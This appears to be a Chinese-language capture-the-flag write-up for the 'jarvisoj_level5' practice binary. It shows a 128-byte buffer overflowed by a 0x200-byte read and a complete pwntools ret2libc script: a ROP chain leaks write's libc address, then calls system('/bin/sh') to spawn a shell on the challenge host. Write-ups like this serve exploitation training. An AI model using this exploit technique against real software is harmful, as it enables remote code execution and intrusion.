jarvisoj_level5

jarvisoj_level5

Arch:     amd64-64-little
RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x3fe000)

64位，只开了NX

ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  write(1, "Input:\n", 7uLL);
  return read(0, buf, 0x200uLL);
}

程序很简单，栈溢出

思路

ret2libc，打write，注意寄存器就行

from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",26804,"./pwn",10)
context(os='linux', arch='amd64',log_level='debug')
libc=ELF('libc-2.23.so')

rdi=0x00000000004006b3
rsi_r15=0x00000000004006b1
pl=cyclic(0x88)+flat(rdi,1,rsi_r15,elf.got['write'],0,elf.sym['write'],0x40061A)
sa(b'put',pl)
leak=get_addr_u64()-libc.sym['write']
li(leak)
sys=system(leak)
sh=shell(leak)
pl=cyclic(0x88)+flat(rdi,sh,sys)
s(pl)

ia(c)